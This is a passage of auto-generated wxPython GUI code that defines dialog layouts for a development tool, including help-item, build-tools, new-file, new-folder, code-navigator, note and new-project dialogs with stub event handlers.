wx.ALL|wx.EXPAND, 5 ) fgSizer65.Add( fgSizer66, 1, wx.EXPAND, 5 ) sbSizer14.Add( fgSizer65, 1, wx.EXPAND|wx.ALL, 5 ) self.SetSizer( sbSizer14 ) self.Layout() # Connect Events self.m_help_items.Bind( wx.EVT_LIST_ITEM_ACTIVATED, self.OnEnterItem ) self.m_help_items.Bind( wx.EVT_LIST_ITEM_DESELECTED, 
self.OnDeselectItem ) self.m_help_items.Bind( wx.EVT_LIST_ITEM_SELECTED, self.OnSelectItem ) self.m_new_btn.Bind( wx.EVT_BUTTON, self.OnNewItem ) self.m_edit_btn.Bind( wx.EVT_BUTTON, self.OnEditItem ) self.m_del_btn.Bind( wx.EVT_BUTTON, self.OnDeleteItem ) def __del__( self ): pass # Virtual event handlers, overide them in your derived class def OnEnterItem( self, event ): event.Skip() def OnDeselectItem( self, event ): event.Skip() def OnSelectItem( self, event ): event.Skip() def OnNewItem( self, event ): event.Skip() def OnEditItem( self, event ): event.Skip() def OnDeleteItem( self, event ): event.Skip() ########################################################################### ## Class NewHelpItem ########################################################################### class NewHelpItem ( wx.Dialog ): def __init__( self, parent ): wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"New help item", pos = wx.DefaultPosition, size = wx.Size( 568,252 ), style = wx.DEFAULT_DIALOG_STYLE ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) fgSizer125 = wx.FlexGridSizer( 4, 1, 0, 0 ) fgSizer125.AddGrowableCol( 0 ) fgSizer125.AddGrowableRow( 0 ) fgSizer125.AddGrowableRow( 2 ) fgSizer125.SetFlexibleDirection( wx.BOTH ) fgSizer125.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer125.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 ) fgSizer126 = wx.FlexGridSizer( 3, 2, 0, 0 ) fgSizer126.AddGrowableCol( 1 ) fgSizer126.SetFlexibleDirection( wx.HORIZONTAL ) fgSizer126.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_ALL ) self.m_staticText85 = wx.StaticText( self, wx.ID_ANY, u"menu label:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText85.Wrap( -1 ) fgSizer126.Add( self.m_staticText85, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL, 5 ) self.m_textCtrl56 = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_textCtrl56.SetMinSize( wx.Size( 150,-1 ) ) fgSizer126.Add( self.m_textCtrl56, 1, 
wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_CENTER_HORIZONTAL|wx.EXPAND, 5 ) self.m_staticText35 = wx.StaticText( self, wx.ID_ANY, u"url:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText35.Wrap( -1 ) fgSizer126.Add( self.m_staticText35, 0, wx.ALL|wx.ALIGN_CENTER_HORIZONTAL|wx.ALIGN_CENTER_VERTICAL, 5 ) self.m_textCtrl29 = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer126.Add( self.m_textCtrl29, 0, wx.ALL|wx.EXPAND, 5 ) self.m_staticText351 = wx.StaticText( self, wx.ID_ANY, u"help string:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText351.Wrap( -1 ) fgSizer126.Add( self.m_staticText351, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL, 5 ) self.m_textCtrl30 = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer126.Add( self.m_textCtrl30, 0, wx.ALL|wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, 5 ) fgSizer125.Add( fgSizer126, 0, wx.RIGHT|wx.LEFT|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_CENTER_HORIZONTAL|wx.EXPAND, 5 ) fgSizer125.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 ) fgSizer158 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer158.AddGrowableCol( 1 ) fgSizer158.SetFlexibleDirection( wx.BOTH ) fgSizer158.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_info = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_TIP, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW|wx.NO_BORDER ) fgSizer158.Add( self.m_info, 0, wx.ALL, 5 ) m_sdbSizer10 = wx.StdDialogButtonSizer() self.m_sdbSizer10OK = wx.Button( self, wx.ID_OK ) m_sdbSizer10.AddButton( self.m_sdbSizer10OK ) self.m_sdbSizer10Cancel = wx.Button( self, wx.ID_CANCEL ) m_sdbSizer10.AddButton( self.m_sdbSizer10Cancel ) m_sdbSizer10.Realize(); fgSizer158.Add( m_sdbSizer10, 1, wx.EXPAND, 5 ) fgSizer125.Add( fgSizer158, 1, wx.EXPAND, 5 ) self.SetSizer( fgSizer125 ) self.Layout() self.Centre( wx.BOTH ) # Connect Events self.m_sdbSizer10OK.Bind( wx.EVT_BUTTON, self.OnOK ) def __del__( self ): pass # Virtual event handlers, 
overide them in your derived class def OnOK( self, event ): event.Skip() ########################################################################### ## Class BuildTools ########################################################################### class BuildTools ( wx.Dialog ): def __init__( self, parent ): wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"C++ Build tools", pos = wx.DefaultPosition, size = wx.Size( 537,301 ), style = wx.DEFAULT_DIALOG_STYLE ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) fgSizer101 = wx.FlexGridSizer( 2, 1, 0, 0 ) fgSizer101.AddGrowableCol( 0 ) fgSizer101.AddGrowableRow( 0 ) fgSizer101.SetFlexibleDirection( wx.BOTH ) fgSizer101.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer158 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer158.AddGrowableCol( 0 ) fgSizer158.AddGrowableRow( 0 ) fgSizer158.SetFlexibleDirection( wx.BOTH ) fgSizer158.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_listbook2 = wx.Listbook( self, wx.ID_ANY, wx.DefaultPosition, wx.Size( -1,-1 ), wx.LB_RIGHT ) self.m_panel21 = wx.Panel( self.m_listbook2, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL ) fgSizer157 = wx.FlexGridSizer( 1, 1, 0, 0 ) fgSizer157.AddGrowableCol( 0 ) fgSizer157.AddGrowableRow( 0 ) fgSizer157.SetFlexibleDirection( wx.BOTH ) fgSizer157.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_auinotebook4 = wx.aui.AuiNotebook( self.m_panel21, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.aui.AUI_NB_BOTTOM ) fgSizer157.Add( self.m_auinotebook4, 1, wx.EXPAND |wx.ALL, 5 ) self.m_panel21.SetSizer( fgSizer157 ) self.m_panel21.Layout() fgSizer157.Fit( self.m_panel21 ) self.m_listbook2.AddPage( self.m_panel21, u"linux gnu", False ) fgSizer158.Add( self.m_listbook2, 1, wx.EXPAND |wx.ALL, 5 ) fgSizer159 = wx.FlexGridSizer( 4, 1, 0, 0 ) fgSizer159.AddGrowableRow( 3 ) fgSizer159.SetFlexibleDirection( wx.BOTH ) fgSizer159.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_bpButton49 = 
wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_NEW, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW ) fgSizer159.Add( self.m_bpButton49, 0, wx.ALL, 5 ) self.m_bpButton50 = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_INFORMATION, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW ) fgSizer159.Add( self.m_bpButton50, 0, wx.ALL, 5 ) self.m_bpButton51 = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_DELETE, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW ) self.m_bpButton51.Enable( False ) fgSizer159.Add( self.m_bpButton51, 0, wx.ALL, 5 ) fgSizer158.Add( fgSizer159, 1, wx.EXPAND, 5 ) fgSizer101.Add( fgSizer158, 1, wx.EXPAND, 5 ) fgSizer155 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer155.AddGrowableCol( 1 ) fgSizer155.SetFlexibleDirection( wx.BOTH ) fgSizer155.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_info = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_TIP, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW|wx.NO_BORDER ) fgSizer155.Add( self.m_info, 0, wx.ALL, 5 ) m_sdbSizer6 = wx.StdDialogButtonSizer() self.m_sdbSizer6OK = wx.Button( self, wx.ID_OK ) m_sdbSizer6.AddButton( self.m_sdbSizer6OK ) self.m_sdbSizer6Cancel = wx.Button( self, wx.ID_CANCEL ) m_sdbSizer6.AddButton( self.m_sdbSizer6Cancel ) m_sdbSizer6.Realize(); fgSizer155.Add( m_sdbSizer6, 1, wx.EXPAND, 5 ) fgSizer101.Add( fgSizer155, 1, wx.EXPAND, 5 ) self.SetSizer( fgSizer101 ) self.Layout() self.Centre( wx.BOTH ) # Connect Events self.m_bpButton49.Bind( wx.EVT_BUTTON, self.OnAddBinariesProfile ) self.m_bpButton50.Bind( wx.EVT_BUTTON, self.OnEditBinariesProfile ) self.m_bpButton51.Bind( wx.EVT_BUTTON, self.OnDeleteBinariesProfile ) def __del__( self ): pass # Virtual event handlers, overide them in your derived class def OnAddBinariesProfile( self, event ): event.Skip() def OnEditBinariesProfile( self, event ): event.Skip() def 
OnDeleteBinariesProfile( self, event ): event.Skip() ########################################################################### ## Class NewFile ########################################################################### class NewFile ( wx.Dialog ): def __init__( self, parent ): wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"NewFile", pos = wx.DefaultPosition, size = wx.Size( 260,120 ), style = wx.DEFAULT_DIALOG_STYLE ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) fgSizer125 = wx.FlexGridSizer( 2, 1, 0, 0 ) fgSizer125.AddGrowableCol( 0 ) fgSizer125.AddGrowableRow( 0 ) fgSizer125.SetFlexibleDirection( wx.BOTH ) fgSizer125.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer126 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer126.AddGrowableCol( 1 ) fgSizer126.SetFlexibleDirection( wx.BOTH ) fgSizer126.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_ALL ) self.m_staticText85 = wx.StaticText( self, wx.ID_ANY, u"File name", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText85.Wrap( -1 ) fgSizer126.Add( self.m_staticText85, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL, 5 ) self.m_textCtrl56 = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_textCtrl56.SetMinSize( wx.Size( 150,-1 ) ) fgSizer126.Add( self.m_textCtrl56, 1, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_CENTER_HORIZONTAL|wx.EXPAND, 5 ) fgSizer125.Add( fgSizer126, 0, wx.RIGHT|wx.LEFT|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_CENTER_HORIZONTAL, 5 ) fgSizer158 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer158.AddGrowableCol( 1 ) fgSizer158.SetFlexibleDirection( wx.BOTH ) fgSizer158.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_info = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_TIP, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW|wx.NO_BORDER ) fgSizer158.Add( self.m_info, 0, wx.ALL, 5 ) m_sdbSizer10 = wx.StdDialogButtonSizer() self.m_sdbSizer10OK = wx.Button( self, wx.ID_OK ) m_sdbSizer10.AddButton( 
self.m_sdbSizer10OK ) self.m_sdbSizer10Cancel = wx.Button( self, wx.ID_CANCEL ) m_sdbSizer10.AddButton( self.m_sdbSizer10Cancel ) m_sdbSizer10.Realize(); fgSizer158.Add( m_sdbSizer10, 1, wx.EXPAND, 5 ) fgSizer125.Add( fgSizer158, 1, wx.EXPAND, 5 ) self.SetSizer( fgSizer125 ) self.Layout() self.Centre( wx.BOTH ) def __del__( self ): pass ########################################################################### ## Class NewFolder ########################################################################### class NewFolder ( wx.Dialog ): def __init__( self, parent ): wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"New folder", pos = wx.DefaultPosition, size = wx.Size( 423,390 ), style = wx.DEFAULT_DIALOG_STYLE ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) fgSizer6 = wx.FlexGridSizer( 3, 1, 0, 0 ) fgSizer6.AddGrowableCol( 0 ) fgSizer6.AddGrowableRow( 1 ) fgSizer6.SetFlexibleDirection( wx.BOTH ) fgSizer6.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer7 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer7.AddGrowableCol( 1 ) fgSizer7.SetFlexibleDirection( wx.BOTH ) fgSizer7.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_staticText4 = wx.StaticText( self, wx.ID_ANY, u"Name", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText4.Wrap( -1 ) fgSizer7.Add( self.m_staticText4, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) self.m_textCtrl2 = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer7.Add( self.m_textCtrl2, 1, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.EXPAND, 5 ) fgSizer6.Add( fgSizer7, 0, wx.EXPAND|wx.ALL, 5 ) sbSizer9 = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u"Documentation" ), wx.VERTICAL ) self.m_richText3 = wx.richtext.RichTextCtrl( sbSizer9.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0|wx.HSCROLL|wx.SUNKEN_BORDER|wx.VSCROLL|wx.WANTS_CHARS ) sbSizer9.Add( self.m_richText3, 1, wx.EXPAND|wx.ALL, 5 ) fgSizer6.Add( sbSizer9, 1, 
wx.EXPAND, 5 ) fgSizer162 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer162.AddGrowableCol( 1 ) fgSizer162.SetFlexibleDirection( wx.BOTH ) fgSizer162.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_info = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_TIP, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW|wx.NO_BORDER ) fgSizer162.Add( self.m_info, 0, wx.ALL, 5 ) m_sdbSizer2 = wx.StdDialogButtonSizer() self.m_sdbSizer2OK = wx.Button( self, wx.ID_OK ) m_sdbSizer2.AddButton( self.m_sdbSizer2OK ) self.m_sdbSizer2Cancel = wx.Button( self, wx.ID_CANCEL ) m_sdbSizer2.AddButton( self.m_sdbSizer2Cancel ) m_sdbSizer2.Realize(); fgSizer162.Add( m_sdbSizer2, 1, wx.EXPAND|wx.TOP|wx.BOTTOM, 5 ) fgSizer6.Add( fgSizer162, 1, wx.EXPAND, 5 ) self.SetSizer( fgSizer6 ) self.Layout() self.Centre( wx.BOTH ) # Connect Events self.m_sdbSizer2OK.Bind( wx.EVT_BUTTON, self.OnOK ) def __del__( self ): pass # Virtual event handlers, overide them in your derived class def OnOK( self, event ): event.Skip() ########################################################################### ## Class codeNavigator ########################################################################### class codeNavigator ( wx.Dialog ): def __init__( self, parent ): wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = wx.EmptyString, pos = wx.Point( -1,-1 ), size = wx.Size( 284,404 ), style = 0|wx.NO_BORDER|wx.WANTS_CHARS ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) self.SetExtraStyle( self.GetExtraStyle() | wx.WS_EX_BLOCK_EVENTS ) fgSizer131 = wx.FlexGridSizer( 1, 1, 0, 0 ) fgSizer131.AddGrowableCol( 0 ) fgSizer131.AddGrowableRow( 0 ) fgSizer131.SetFlexibleDirection( wx.BOTH ) fgSizer131.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_treeCtrl3 = wx.TreeCtrl( self, wx.ID_ANY, wx.Point( 0,0 ), wx.DefaultSize, wx.TR_HAS_BUTTONS|wx.TR_HIDE_ROOT|wx.TR_SINGLE ) fgSizer131.Add( self.m_treeCtrl3, 0, wx.EXPAND|wx.ALL, 5 ) self.SetSizer( fgSizer131 ) 
self.Layout() # Connect Events self.Bind( wx.EVT_KEY_DOWN, self.OnKeyDown ) self.m_treeCtrl3.Bind( wx.EVT_KEY_DOWN, self.OnKeyDown ) self.m_treeCtrl3.Bind( wx.EVT_TREE_ITEM_ACTIVATED, self.OnSelectedItem ) self.m_treeCtrl3.Bind( wx.EVT_TREE_ITEM_EXPANDED, self.OnExpandItem ) def __del__( self ): pass # Virtual event handlers, overide them in your derived class def OnKeyDown( self, event ): event.Skip() def OnSelectedItem( self, event ): event.Skip() def OnExpandItem( self, event ): event.Skip() ########################################################################### ## Class Import ########################################################################### class Import ( wx.Dialog ): def __init__( self, parent ): wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = wx.EmptyString, pos = wx.DefaultPosition, size = wx.DefaultSize, style = wx.DEFAULT_DIALOG_STYLE ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) self.Centre( wx.BOTH ) def __del__( self ): pass ########################################################################### ## Class NewNote ########################################################################### class NewNote ( wx.Dialog ): def __init__( self, parent ): wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"New note", pos = wx.DefaultPosition, size = wx.Size( 480,299 ), style = wx.DEFAULT_DIALOG_STYLE ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) fgSizer103 = wx.FlexGridSizer( 2, 1, 0, 0 ) fgSizer103.AddGrowableCol( 0 ) fgSizer103.AddGrowableRow( 0 ) fgSizer103.SetFlexibleDirection( wx.BOTH ) fgSizer103.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) sbSizer30 = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, wx.EmptyString ), wx.VERTICAL ) self.m_text = wx.richtext.RichTextCtrl( sbSizer30.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0|wx.VSCROLL|wx.HSCROLL|wx.NO_BORDER|wx.WANTS_CHARS ) sbSizer30.Add( self.m_text, 1, wx.EXPAND |wx.ALL, 5 ) fgSizer103.Add( sbSizer30, 
1, wx.EXPAND|wx.ALL, 5 ) fgSizer156 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer156.AddGrowableCol( 1 ) fgSizer156.SetFlexibleDirection( wx.BOTH ) fgSizer156.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_info = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_TIP, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW|wx.NO_BORDER ) fgSizer156.Add( self.m_info, 0, wx.ALL, 5 ) m_sdbSizer7 = wx.StdDialogButtonSizer() self.m_sdbSizer7OK = wx.Button( self, wx.ID_OK ) m_sdbSizer7.AddButton( self.m_sdbSizer7OK ) self.m_sdbSizer7Cancel = wx.Button( self, wx.ID_CANCEL ) m_sdbSizer7.AddButton( self.m_sdbSizer7Cancel ) m_sdbSizer7.Realize(); fgSizer156.Add( m_sdbSizer7, 1, wx.EXPAND, 5 ) fgSizer103.Add( fgSizer156, 1, wx.EXPAND, 5 ) self.SetSizer( fgSizer103 ) self.Layout() self.Centre( wx.BOTH ) # Connect Events self.m_sdbSizer7OK.Bind( wx.EVT_BUTTON, self.OnOK ) def __del__( self ): pass # Virtual event handlers, overide them in your derived class def OnOK( self, event ): event.Skip() ########################################################################### ## Class NewProject ########################################################################### class NewProject ( wx.Dialog ): def __init__( self, parent ): wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"New Project", pos = wx.DefaultPosition, size = wx.Size( 436,561 ), style = wx.DEFAULT_DIALOG_STYLE ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) self.fgSizer4 = wx.FlexGridSizer( 2, 1, 0, 0 ) self.fgSizer4.AddGrowableCol( 0 ) self.fgSizer4.AddGrowableRow( 0 ) self.fgSizer4.SetFlexibleDirection( wx.BOTH ) self.fgSizer4.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_ALL ) self.m_auinotebook2 = wx.Notebook( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.NB_BOTTOM ) self.m_panel5 = wx.Panel( self.m_auinotebook2, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL ) self.fgSizer65 = wx.FlexGridSizer( 3, 1, 0, 0 ) self.fgSizer65.AddGrowableCol( 
0 ) self.fgSizer65.AddGrowableRow( 1 ) self.fgSizer65.SetFlexibleDirection( wx.BOTH ) self.fgSizer65.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer5 = wx.FlexGridSizer( 5, 2, 0, 0 ) fgSizer5.AddGrowableCol( 1 ) fgSizer5.SetFlexibleDirection( wx.BOTH ) fgSizer5.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_staticText2 = wx.StaticText( self.m_panel5, wx.ID_ANY, u"Name:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText2.Wrap( -1 ) fgSizer5.Add( self.m_staticText2, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) self.m_textCtrl1 = wx.TextCtrl( self.m_panel5, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer5.Add( self.m_textCtrl1, 0, wx.ALL|wx.EXPAND, 5 ) self.m_staticText3 = wx.StaticText( self.m_panel5, wx.ID_ANY, u"Base directory:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText3.Wrap( -1 ) fgSizer5.Add( self.m_staticText3, 0, wx.ALL|wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL, 5 ) fgSizer29 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer29.AddGrowableCol( 0 ) fgSizer29.SetFlexibleDirection( wx.BOTH ) fgSizer29.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_textCtrl9 = wx.TextCtrl( self.m_panel5, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, wx.TE_READONLY ) fgSizer29.Add( self.m_textCtrl9, 0, wx.ALL|wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, 5 ) self.m_bpButton3 = wx.BitmapButton( self.m_panel5, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_FOLDER_OPEN, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW ) fgSizer29.Add( self.m_bpButton3, 0, wx.ALL, 5 ) fgSizer5.Add( fgSizer29, 1, wx.EXPAND, 5 ) self.fgSizer65.Add( fgSizer5, 1, wx.EXPAND|wx.ALL, 5 ) self.m_choicebook1 = wx.Choicebook( self.m_panel5, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.CHB_DEFAULT ) self.m_panel18 = wx.Panel( self.m_choicebook1, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL ) fgSizer130 = wx.FlexGridSizer( 3, 2, 0, 0 ) fgSizer130.AddGrowableCol( 1 ) 
fgSizer130.SetFlexibleDirection( wx.BOTH ) fgSizer130.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_staticText30 = wx.StaticText( self.m_panel18, wx.ID_ANY, u"Headers subdir.:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText30.Wrap( -1 ) fgSizer130.Add( self.m_staticText30, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) self.m_textCtrl23 = wx.TextCtrl( self.m_panel18, wx.ID_ANY, u"include", wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer130.Add( self.m_textCtrl23, 0, wx.ALL|wx.EXPAND, 5 ) self.m_staticText31 = wx.StaticText( self.m_panel18, wx.ID_ANY, u"Sources subdir.:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText31.Wrap( -1 ) fgSizer130.Add( self.m_staticText31, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) self.m_textCtrl24 = wx.TextCtrl( self.m_panel18, wx.ID_ANY, u"src", wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer130.Add( self.m_textCtrl24, 0, wx.ALL|wx.EXPAND, 5 ) self.m_checkBox52 = wx.CheckBox( self.m_panel18, wx.ID_ANY, u"master include", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_checkBox52.SetValue(True) fgSizer130.Add( self.m_checkBox52, 0, wx.ALL|wx.ALIGN_RIGHT, 5 ) self.m_textCtrl25 = wx.TextCtrl( self.m_panel18, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer130.Add( self.m_textCtrl25, 0, wx.ALL|wx.EXPAND, 5 ) self.m_panel18.SetSizer( fgSizer130 ) self.m_panel18.Layout() fgSizer130.Fit( self.m_panel18 ) self.m_choicebook1.AddPage( self.m_panel18, u"c++ project", True ) self.m_panel19 = wx.Panel( self.m_choicebook1, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL ) self.m_choicebook1.AddPage( self.m_panel19, u"python project", False ) self.m_panel13 = wx.Panel( self.m_choicebook1, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL ) fgSizer58 = wx.FlexGridSizer( 1, 1, 0, 0 ) fgSizer58.AddGrowableCol( 0 ) fgSizer58.AddGrowableRow( 0 ) fgSizer58.SetFlexibleDirection( wx.BOTH ) fgSizer58.SetNonFlexibleGrowMode( 
wx.FLEX_GROWMODE_SPECIFIED ) self.m_choicebook4 = wx.Choicebook( self.m_panel13, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.CHB_DEFAULT ) self.m_panel14 = wx.Panel( self.m_choicebook4, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL ) fgSizer59 = wx.FlexGridSizer( 3, 1, 0, 0 ) fgSizer59.AddGrowableCol( 0 ) fgSizer59.SetFlexibleDirection( wx.BOTH ) fgSizer59.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer60 = wx.FlexGridSizer( 3, 2, 0, 0 ) fgSizer60.AddGrowableCol( 1 ) fgSizer60.SetFlexibleDirection( wx.BOTH ) fgSizer60.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_staticText29 = wx.StaticText( self.m_panel14, wx.ID_ANY, u"Host:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText29.Wrap( -1 ) fgSizer60.Add( self.m_staticText29, 0, wx.ALL|wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL, 5 ) self.m_textCtrl252 = wx.TextCtrl( self.m_panel14, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer60.Add( self.m_textCtrl252, 0, wx.ALL|wx.EXPAND, 5 ) self.m_staticText27 = wx.StaticText( self.m_panel14, wx.ID_ANY, u"User:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText27.Wrap( -1 ) fgSizer60.Add( self.m_staticText27, 0, wx.ALL|wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL, 5 ) self.m_textCtrl231 = wx.TextCtrl( self.m_panel14, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer60.Add( self.m_textCtrl231, 0, wx.ALL|wx.EXPAND, 5 ) self.m_staticText28 = wx.StaticText( self.m_panel14, wx.ID_ANY, u"Password:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText28.Wrap( -1 ) fgSizer60.Add( self.m_staticText28, 0, wx.ALL|wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL, 5 ) self.m_textCtrl241 = wx.TextCtrl( self.m_panel14, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, wx.TE_PASSWORD ) 